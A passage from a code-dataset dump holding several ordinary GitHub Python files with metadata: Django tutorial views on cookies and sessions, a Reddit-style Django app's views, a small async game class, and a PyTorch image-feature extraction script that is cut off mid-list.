"django.contrib.auth.models.Group", "line_number": 170, "usage_type": "name"}, {"api_name": "django.contrib.messages.warning", "line_number": 183, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 183, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 189, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 189, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 191, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria.objects.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "pytania.models.Kategoria.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pytania.models.Kategoria", "line_number": 196, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 207, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 207, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 209, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria.objects.filter", "line_number": 214, "usage_type": "call"}, {"api_name": "pytania.models.Kategoria.objects", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytania.models.Kategoria", "line_number": 214, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 225, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 225, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 226, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 245, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 248, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 248, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 249, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek.objects.filter", "line_number": 254, "usage_type": "call"}, {"api_name": "pytania.models.Obrazek.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "pytania.models.Obrazek", "line_number": 254, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 265, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 265, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 266, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 271, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 271, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 272, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 277, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 277, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie", "line_number": 279, "usage_type": "name"}, {"api_name": "pytania.forms.PytanieForm", "line_number": 280, "usage_type": "name"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 287, "usage_type": "call"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 296, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 309, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 317, "usage_type": "name"}, {"api_name": "django.views.generic.list.ListView", "line_number": 317, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie", "line_number": 319, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie.objects.filter", "line_number": 323, "usage_type": "call"}, {"api_name": "pytania.models.Pytanie.objects", "line_number": 323, "usage_type": "attribute"}, {"api_name": "pytania.models.Pytanie", "line_number": 323, "usage_type": "name"}, {"api_name": "pytania.forms.PytanieForm", "line_number": 332, "usage_type": "call"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 333, "usage_type": "call"}, {"api_name": "pytania.models.Pytanie", "line_number": 333, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 335, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms", "line_number": 335, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 339, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "74818201123", "text": "from django.http import HttpResponse\nimport json\nfrom django.shortcuts import render, redirect\n\n\ndef index(request):\n pass\n\n\ndef Cookie(request):\n response = HttpResponse('ok')\n response.set_cookie('xuxu1','python1')\n response.set_cookie(\"xuxu2\",'python2')\n # 字典的方式获取cookie 获取不到数据会报错\n # cookie1 = request.COOKIES['xuxu1']\n # get 方式获取不到数据会返回None\n cookie1 = request.COOKIES.get('xuxu')\n # request.COOKIE返回的为字典类型\n response.delete_cookie(\"xuxu1\")\n print(cookie1)\n return response\n\n# Create your views here.\ndef goods(request,cat_id,goods_id):\n\n # print(cat_id,\"------\",goods_id)\n # return HttpResponse({\"cat_id\",cat_id,\"id\",goods_id})\n query_params=request.GET\n print(query_params)\n print(query_params.get(\"order\"))\n print(query_params.getlist(\"order\"))\n # <QueryDict: {'order':[\"readcount\"]}>\n # QueryDict 具有字典的特性\n # 还具有 一键多值\n # <QueryDict: {'order':['readcount','commentcount'],'page':['1']}>\n\n\n\n return HttpResponse(\"骑个饭店\")\n\ndef content(request):\n dict_j = request.body\n print(type(dict_j)) # bite类型需要转换成字符串\n # print(dict_j)\n dict_str = dict_j.decode() # 字符串类型\n # print(dict_str)\n print(type(dict_str))\n # dict_json = eval(dict_str)\n # print(dict_json)\n dict_json = json.loads(dict_str) # 使用json模块进行解码\n print(dict_json)\n print(type(dict_json))\n # print(dict_json['name'])\n\n ############请求头##############\n # print(request.META) # 获取请求头给的字典类型\n # print(type(request.META))\n # <class 'dict'>\n return HttpResponse(\"ok\")\n\ndef method(request):\n print(request.method) # 返回请求的方式\n return HttpResponse('method')\n\nfrom django.http import HttpResponse,JsonResponse\ndef response(request):\n # response = HttpResponse(\"res\",status=200)\n #\n # response['name'] = 'xuxuxuxu'\n #\n # return response\n # JSON --> dict\n # dict --> JSON\n\n info = {\n 'name':'xuxuuxu',\n 'address':'shunyi'\n }\n girl_friends=[\n {\n 'name':'rose',\n 'address':'shunyi'\n },\n {\n 'name':'jack',\n 'adress':'changping'\n }\n ]\n # data 返回的响应数据 一般是字典类型\n \"\"\"\n safe = Turn 是表示 我们的data是字典类型\n JsonResponse 可以把字典转换为json\n \n 现在给了一个非字典数据,出了问题 我们自己负责\n \"\"\"\n # response = JsonResponse(data=info) # 安全检测机制,data不是字典要把safe变为False\n# # # response = JsonResponse(data=girl_friends,safe=False)\n# # response['name'] = info['name']\n# # response['address'] = info['address']\n# # return 
\n\n    # redirect: jump to the given page\n\n    return redirect('http://www.baidu.com')\n\n    # equivalent to JsonResponse(data=..., safe=...) above,\n    # but without the safety check\n    # data = json.dumps(girl_friends)\n    # response = HttpResponse(data)\n    # return response\n\n    # 1xx\n    # 2xx  200  success\n    # 3xx\n    # 4xx   the request has a problem\n    # 404 page not found (a routing problem)\n    # 403  access forbidden (a permissions problem)\n    # 5xx\n    # HTTP status code must be an integer from 100 to 599\n\n\n#####################################\n\n\"\"\"\nQuery string\nhttp://ip:port/path/path/?key=value&key1=value1\n\n\nThe URL is split into 2 parts at the '?':\nbefore the '?' is the request path,\nafter the '?' is the query string; the query string is dict-like, key=value pairs joined with '&'\n\"\"\"\n#########################################################\n# sessions are stored on the server side -- the data is relatively safe\n# sessions depend on cookies\n\n\"\"\"\nOn the first request, http://127.0.0.1:8000/set_session/?uersname=xuxuxu,\nwe set the session data on the server side.\nThe server also generates a sessionid cookie;\nafter the browser receives it, it stores the cookie data.\n\nThe second and all later requests carry this sessionid; the server validates it,\nand if the check passes it reads the related data and runs the business logic.\n\n\"\"\"\n\ndef set_session(request):\n    # 1. simulate fetching the user info\n    username = request.GET.get(\"username\")\n\n    # 2. set the session data\n    # suppose a model query has returned the user's info\n    user_id=3\n    print(username)\n\n    request.session[\"user_id\"] = user_id\n    request.session[\"user_name\"]=username\n\n    # clear() removes the data in the session but keeps the key\n    # request.session.clear()\n    # flush() removes all the data, including the key\n    # request.session.flush()\n\n    # request.session.set_expiry(3600) # in seconds; the default is two weeks\n    return HttpResponse('set_session')\n\ndef get_session(request):\n    # dictionary-style lookup raises an error when the key is missing; .get() returns None instead\n    # user_id = request.session[\"user_id\"]\n    # user_name = request.session[\"user_name\"]\n    user_id = request.session.get(\"user_id\")\n    user_name = request.session.get(\"user_name\")\n    user_time = request.session.get_expiry_date()\n    content = \"{},{},{}\".format(user_id,user_name,user_time)\n\n    return HttpResponse(content)\n\n####################################################\n# class views\n\ndef login(request):\n    print(request.method)\n    if request.method == 'GET':\n        return HttpResponse(f'{request.method}逻辑')\n\n    else:\n        return HttpResponse(f'{request.method}逻辑')\n\n\n# defining a class view\n\"\"\"\nclass ClassViewName(view):\n    def get(self,request):\n        return HttpResponse(\"xxxx\")\n    \n    def http_method_lower(self,request):\n        return HttpResponse(\"xxxx\")\n    \n1. Inherit from View.\n2. The methods of a class view are named after the HTTP methods, lowercased, to tell the request types apart.\n\"\"\"\n
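# Editor's illustrative sketch (not part of the original file): a class view is\n# hooked into the URLconf with as_view(), which dispatches GET to get() and POST\n# to post():\n#\n#     from django.urls import path\n#     urlpatterns = [path('login/', LoginView.as_view())]\n\n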
from django.views import View\n\nclass LoginView(View):\n\n    def post(self,request):\n        return HttpResponse(\"post get get\")\n\n\n    def get(self,request):\n        return redirect('login/')\n\n\n\n", "repo_name": "xu678/Djiango", "sub_path": "book_django02/book/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5961, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.HttpResponse", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 177, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 188, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 205, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 208, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 212, "usage_type": "call"}]}
+{"seq_id": "20358830510", "text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom django.http import HttpResponse,JsonResponse,Http404\nfrom django.forms.models import model_to_dict\nfrom django.template import TemplateDoesNotExist\nfrom django.contrib.auth import authenticate,login,logout\n\nfrom .models import Post,Comment\nfrom .forms import CommentForm,UserForm,UserProfileForm,PostForm\n\n# Create your views here.\ndef main_page(request):\n    posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('published_date') \n    return render(request, 'sub/main_page.html', {'posts':posts})\n\ndef main_page_news(request):\n    posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-published_date') \n    return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef main_page_tops(request):\n    posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-points') \n    return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef main_page_hots(request):\n    posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-comment_counts') \n    return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef comments_page(request, pk, slug):\n    post = get_object_or_404(Post, pk=pk)\n    comment_count = post.post_comments.count()\n    comments = post.post_comments.prefetch_related('reply_comments').filter(parent_comment__isnull=True).order_by('-published_date')\n    return render(request, 'sub/comments_page.html', {'post':post,'comments':comments, 'comment_count':comment_count})\n\ndef make_post_page(request):\n    return render(request, 'sub/make_post_page.html')\n\ndef login_view(request):\n    logged = False\n    if request.method == 'POST':\n        username = request.POST.get('username')\n        password =
request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n print(\"yep1\")\n login(request, user)\n logged=True\n \n return HttpResponse(logged)\n\ndef logout_view(request):\n if request.method == 'POST':\n logout(request)\n return HttpResponse(\"logout.\")\n else:\n return Http404\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n print(request.POST);\n print(user_form.is_valid());\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n \n user.set_password(user.password) #hashing\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n \n profile.save()\n registered = True\n login(request,user)\n \n return HttpResponse(registered)\n\ndef get_template(request, template_name):\n try:\n return render(request, 'sub/kids/'+template_name+'.html')\n except TemplateDoesNotExist:\n return Http404\n\ndef make_post(request):\n if request.method == 'POST':\n post_form = PostForm(data=request.POST)\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.user = request.user\n post.save_it()\n return redirect('comments_page', pk=post.pk, slug=post.slug)\n\n return render(request, 'sub/make_post_page.html')\n\ndef make_comment(request): \n if request.method == 'POST':\n text = request.POST.get('text')\n parentpost_id = int(request.POST.get('parentpost_id'))\n parent_comment = None\n try:\n parentcomment_id = int(request.POST.get('parentcomment_id'))\n parent_comment = Comment.objects.get(pk = parentcomment_id)\n except Exception:\n parent_comment = None \n\n comm = Comment(text = text, parent_post = Post.objects.get(pk = parentpost_id), \n parent_comment = parent_comment,\n user= request.user, published_date = timezone.now())\n comm.save()\n return render(request, 'sub/comment_box.html',{'comment':comm})\n\n return Http404\n\ndef give_point(request):\n if request.method == 'GET':\n obj_id = request.GET['post_id']\n arrow_dir = request.GET['arrow_dir']\n what_type = request.GET['what_type']\n obj = None\n\n if what_type == \"post\":\n obj = Post.objects.get(pk=int(obj_id))\n elif what_type == \"comment\": \n obj = Comment.objects.get(pk=int(obj_id))\n \n if obj != None: \n if arrow_dir == \"true\": \n obj.point_up()\n else:\n obj.point_down()\n\n return HttpResponse(obj.points)", "repo_name": "Outsidev/rezzit-django", "sub_path": "subreddapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Post.objects.annotate", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.objects.annotate", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": 
"models.Post.objects.annotate", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Post.objects.annotate", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 56, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 61, "usage_type": "call"}, {"api_name": "forms.UserProfileForm", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 76, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "django.template.TemplateDoesNotExist", "line_number": 83, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 84, "usage_type": "name"}, {"api_name": "forms.PostForm", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Comment.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 104, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 110, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 114, "usage_type": "name"}, {"api_name": "models.Post.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 124, 
"usage_type": "name"}, {"api_name": "models.Comment.objects.get", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 126, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "20517209550", "text": "import asyncio\n\nfrom modules.player import Player\nfrom modules.enemy import Enemy\nfrom modules import template\n\ngame_state = { \"NEW\": \"NEW\", \"PLAYING\": \"PLAYING\", \"ENDED\": \"ENDED\" }\n\nclass Game:\n\n def __init__(self, guild, channel):\n self.players = []\n self.guild = guild\n self.channel = channel\n self.state = game_state[\"NEW\"]\n self.active = None\n\n def get_player(self, author):\n for i, o in enumerate(self.players):\n if o.type == \"PLAYER\" and o.author == author:\n return self.players[i]\n return None\n\n def get_npc_by_name(self, name):\n for i, o in enumerate(self.players):\n if o.type == \"NPC\" and o.name == name:\n return self.players[i]\n return None\n\n async def add_player(self, ctx, player):\n self.players.append(player)\n\n if ctx:\n msg = \"{name} has entered the game.\".format(name=player.name)\n await ctx.channel.send(msg)\n await asyncio.sleep(.5)\n\n def kick_player(self, player):\n for i, o in enumerate(self.players):\n if o == player:\n del self.players[i]\n break\n return\n\n def get_readable_player_status(self, player):\n return \"{name} {hp}/{max_hp}HP {ap}/{max_ap}AP\".format(\n name=player.name,\n hp=player.hp,max_hp=player.max_hp,\n ap=player.ap,\n max_ap=player.max_ap\n )\n\n def get_game_status(self):\n statuses = []\n for i, o in enumerate(self.players):\n statuses.append(self.get_readable_player_status(o))\n return \"\\n\".join(statuses)\n\n async def start(self, ctx):\n self.state = game_state[\"PLAYING\"]\n self.active = 0\n await self.next_turn(ctx)\n return\n\n def mark_next_player_active(self):\n if self.active == len(self.players) - 1:\n self.active = 0\n else:\n self.active += 1\n\n async def next_turn(self, ctx):\n player = self.players[self.active]\n msg = \"It is {name}'s turn.\".format(name=player.name)\n await ctx.channel.send(msg)\n await asyncio.sleep(2)\n if player.type == \"NPC\":\n await player.attack(ctx)\n await asyncio.sleep(2)\n self.mark_next_player_active()\n await self.next_turn(ctx)\n\n return\n\n async def init_template(self, ctx, name):\n await template.init_template(ctx, self, name)", "repo_name": "drikusroor/ainabs-lair", "sub_path": "modules/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 2218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.template.init_template", "line_number": 85, "usage_type": "call"}, {"api_name": "modules.template", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "16756479264", "text": "import cv2\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import models\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\n\nfrom scipy.spatial import distance\nimport time\nfrom detect_notch import OrientationDetection\ntry:\n from lib.warp_and_reverse_warp import warp_polar, reverse_warp\nexcept:\n 
from .lib.warp_and_reverse_warp import warp_polar, reverse_warp\n\nimport json\nfrom easydict import EasyDict\nfrom pathlib import Path\n\ndef preprocess( img, crop_circle, resize_ratio = 0.3):\n    '''\n    Resize the image, warp it around the given circle and reverse-warp it back,\n    then crop the bounding square of the circle.\n\n    :param img: input image (numpy array)\n    :param crop_circle: (x, y, r) circle used for the warp and the crop\n    :return: the reverse-warped image cropped to the circle\n    '''\n\n    img = cv2.resize(img, (int(img.shape[1] * resize_ratio), int(img.shape[0] * resize_ratio)))\n    ### warp\n    img, warp = warp_polar(img, crop_circle)\n    reversed_warp = reverse_warp(img, warp, crop_circle)\n    ### crop\n    reversed_warp = reversed_warp[int(crop_circle[1] - crop_circle[2]):int(crop_circle[1] + crop_circle[2]),\n                    int(crop_circle[0] - crop_circle[2]):int(crop_circle[0] + crop_circle[2])]\n    return reversed_warp\n\nclass FeatureVisualization():\n    def __init__(self, index=0, selected_layer=0, model = \"vgg\", json_path = \"config/classification.json\", features_path = \"\"):\n\n\n        try:\n            with Path(json_path).open(\"r\") as f:\n                self.opt = json.load(f)\n            self.opt = EasyDict(self.opt)\n            print(self.opt)\n        except:\n            print(\"No such file {}\".format(json_path))\n\n        self.folder_ref = self.opt.folder_ref\n        try:\n            self.names_ref = os.listdir(self.folder_ref)\n        except:\n            print(\"The directory {} does not exist \".format(self.folder_ref))\n            raise\n        self.debug = self.opt.debug.lower() in (\"yes\", \"true\", \"t\", \"1\")\n        self.circle_platfrom = self.opt.crop_circle_platform\n        self.crop_circle = self.opt[\"crop_circle\"].lower() in [\"t\", \"true\", \"True\"]\n\n        self.index = index\n        # self.img_path = img_path\n        self.selected_layer = selected_layer\n        self.modelnames = [\"vgg16\",\"mobilenet_v2\",\"densenet121\",\"densenet201\",\"resnext50_32x4d\",\"vgg19\",\"alexnet\",\"squeezenet1_1\",\"mnasnet1_0\"]\n        if model == \"vgg16\":\n            # Load pretrained model\n            self.pretrained_model = models.vgg16(pretrained=True)\n            # print(self.pretrained_model)\n            self.pretrained_model2 = models.vgg16(pretrained=True)\n        elif model == \"mobilenet_v2\":\n            self.pretrained_model = models.mobilenet_v2(pretrained=True)\n            self.pretrained_model2 = models.mobilenet_v2(pretrained=True)\n\n        elif model == \"densenet121\":\n            self.pretrained_model = models.densenet121(pretrained=True)\n            self.pretrained_model2 = models.densenet121(pretrained=True)\n\n        elif model == \"densenet201\":\n            self.pretrained_model = models.densenet201(pretrained=True)\n            self.pretrained_model2 = models.densenet201(pretrained=True)\n\n        elif model == \"resnext50_32x4d\":\n            self.pretrained_model = models.resnext50_32x4d(pretrained=True)\n            self.pretrained_model2 = models.resnext50_32x4d(pretrained=True)\n\n        elif model == \"vgg19\":\n            self.pretrained_model = models.vgg19(pretrained=True)\n            self.pretrained_model2 = models.vgg19(pretrained=True)\n\n        elif model == \"alexnet\":\n            self.pretrained_model = models.alexnet(pretrained=True)\n            self.pretrained_model2 = models.alexnet(pretrained=True)\n\n        elif model == \"squeezenet1_1\":\n            self.pretrained_model = models.squeezenet1_1(pretrained=True)\n            self.pretrained_model2 = models.squeezenet1_1(pretrained=True)\n\n        elif model == \"mnasnet1_0\":\n            self.pretrained_model = models.mnasnet1_0(pretrained=True)\n            self.pretrained_model2 = models.mnasnet1_0(pretrained=True)\n\n\n        else:\n            # Fall back to the default vgg16 backbone\n            self.pretrained_model = models.vgg16(pretrained=True)\n            # print(self.pretrained_model)\n            self.pretrained_model2 = models.vgg16(pretrained=True)\n            print(\"Unknown model name, falling back to vgg16\")\n\n        self.cuda_is_avalible = torch.cuda.is_available()\n        print(self.cuda_is_avalible)\n        if self.cuda_is_avalible:\n            self.pretrained_model.to(torch.device(\"cuda:0\"))\n            
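# Editor's note: two copies of the backbone are kept -- self.pretrained_model is\n            # iterated layer by layer for intermediate feature maps, while self.pretrained_model2\n            # is called end-to-end for the final feature vector. nn.Module.to() moves the\n            # parameters in place, so no reassignment is needed here.\n            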
self.pretrained_model2.to(torch.device(\"cuda:0\"))\n\n\n ## initialize the data\n try:\n # Read the JSON file\n with open(features_path, \"r\") as file:\n json_data = file.read()\n # Parse the JSON data into a dictionary\n self.names_result = json.loads(json_data)\n self.names_ref = list(self.names_result.keys())\n print(\"READ feature file successfully \")\n\n\n except:\n\n self.get_imgs_in_ref_score()\n features_result_path = f\"./config/features_result_{model}.json\"\n print(self.names_result_save)\n with open(features_result_path, 'w') as file:\n json.dump(self.names_result_save, file)\n\n print(\"Dictionary saved as JSON successfully.\")\n\n\n def get_imgs_in_ref_score(self):\n names_result = {}\n names_result_save = {}\n print(\"self.names_ref\",self.names_ref)\n\n key = 0\n for j in range(len(self.names_ref)):\n img2 = cv2.imread(os.path.join(self.opt.folder_ref, self.names_ref[j]))\n\n if self.crop_circle is True:\n\n img2 = preprocess(img2, self.circle_platfrom, resize_ratio= 0.3)\n\n # cv2.imshow(\"see_crop\", img2)\n # key = cv2.waitKey(int(key))\n # print(\"0\")\n # imgasvar = featureVis.preprocess_image(img2)\n self.set_index(j)\n outputs2 = self.get_fc_feature(img2)\n # self.plot_probablity(outputs2)\n\n # names_result[self.names_ref[j]] = outputs2\n names_result_save[self.names_ref[j]] = outputs2.cpu().tolist()\n\n self.names_result_save = names_result_save\n self.names_result = names_result_save\n\n return names_result\n\n # @staticmethod\n def preprocess_image(self, cv2im, resize_im=True):\n # print(len(cv2im))\n # Resize image\n if resize_im:\n cv2im = cv2.resize(cv2im, (224, 224))\n im_as_arr = np.float32(cv2im)\n im_as_arr = np.ascontiguousarray(im_as_arr[..., ::-1])\n im_as_arr = im_as_arr.transpose(2, 0, 1) # Convert array to D,W,H\n # Normalize the channels\n for channel, _ in enumerate(im_as_arr):\n im_as_arr[channel] /= 255\n # Convert to float tensor\n im_as_ten = torch.from_numpy(im_as_arr).float()\n # Add one more channel to the beginning. 
Tensor shape = 1,3,224,224\n im_as_ten.unsqueeze_(0)\n # Convert to Pytorch variable\n im_as_var = Variable(im_as_ten, requires_grad=False)\n if self.cuda_is_avalible:\n im_as_var = im_as_var.to(torch.device(\"cuda:0\"))\n return im_as_var\n def set_index(self, index):\n self.index = index\n\n def process_image(self, img):\n # print('input image:')\n img = self.preprocess_image(img)\n return img\n\n def get_feature(self,img):\n # Image preprocessing\n input = self.process_image(img)\n # print(\"input.shape:{}\".format(input.shape))\n x = input\n self.pretrained_model.eval()\n with torch.no_grad():\n for index, layer in enumerate(self.pretrained_model):\n x = layer(x)\n # print(\"{}:{}\".format(index,x.shape))\n if (index == self.selected_layer):\n return x\n\n def get_conv_feature(self,img):\n # Get the feature map\n features = self.get_feature(img)\n result_path = './feat_' + str(self.selected_layer)\n\n if not os.path.exists(result_path):\n os.makedirs(result_path)\n\n def plot_probablity(self, outputs):\n outputs = outputs.cpu()\n outputs = outputs.data.numpy()\n # print(outputs.shape)\n outputs = np.ndarray.tolist(outputs)\n # print(type(outputs),outputs)\n # print(len(outputs[0]))\n # x = range(0, 4096)\n\n # plt.bar(x, outputs[0])\n # plt.xlabel(\"Dimension\")\n # plt.ylabel(\"Value\")\n # plt.title(\"FC feature {}\".format(str(self.index)))\n # plt.show()\n\n def get_fc_feature(self,img):\n input = self.process_image(img)\n self.pretrained_model2.eval()\n # self.pretrained_model2.classifier = nn.Sequential(*list(self.pretrained_model2.classifier.children())[0:4])\n with torch.no_grad():\n outputs = self.pretrained_model2(input)\n # self.plot_probablity(outputs)\n return outputs\n\n def compare_cosine(self, out1, out2, metric = None):\n\n '''\n metric = 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',\n 'sqeuclidean', 'wminkowski', 'yule'.\n :param out1:\n :param out2:\n :return:\n '''\n metric_list = ['braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n 'russellrao', 'seuclidean', 'sokalmichener', 